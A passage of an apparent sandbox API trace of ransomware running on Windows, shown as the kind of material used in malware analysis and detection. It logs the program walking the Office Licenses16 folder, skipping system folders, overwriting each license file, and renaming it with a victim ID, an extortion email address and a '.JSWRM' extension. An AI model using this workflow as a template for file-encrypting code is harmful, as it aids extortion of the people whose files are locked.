0x23a438 [0106.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0106.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0106.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0106.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0106.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0106.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0106.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.822] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8278a48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8278a48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe835d8b9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d61, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="PE9706~1.XRM")) returned 1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.822] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0106.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0106.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0106.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0106.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0106.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0106.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0106.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0106.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0106.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.823] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11617) returned 1 [0106.823] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0106.823] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0106.825] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.826] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0106.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.826] CloseHandle (hObject=0x45c) returned 1 [0106.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0106.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0106.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0106.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0106.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0106.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.826] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0106.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.827] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8278a48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8278a48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe86a4c3e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dfa, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PE750F~1.XRM")) returned 1 [0106.827] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0106.827] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0106.827] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0106.827] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0106.827] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0106.827] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0106.828] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0106.828] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.828] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0106.828] lstrcmpiW (lpString1="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0106.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0106.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0106.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0106.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0106.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0106.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0106.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalPipcR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0106.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0106.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0106.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0106.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0106.828] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.829] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19962) returned 1 [0106.829] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0106.829] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0106.831] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.832] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0106.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.832] CloseHandle (hObject=0x45c) returned 1 [0106.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0106.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0106.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0106.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0106.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0106.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.832] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0106.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0106.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.833] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8088bae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8088bae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe816d9f3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51fd, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PersonalR_Grace-ppd.xrm-ms", cAlternateFileName="PE6B57~1.XRM")) returned 1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.833] lstrcmpiW (lpString1="PersonalR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0106.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241178, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0106.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0106.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Grace-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241218, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0106.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0106.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0106.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0106.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.834] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20989) returned 1 [0106.834] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51f0) returned 0x24c1d0 [0106.834] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51f0, lpOverlapped=0x0) returned 1 [0106.837] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.837] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51f0, lpOverlapped=0x0) returned 1 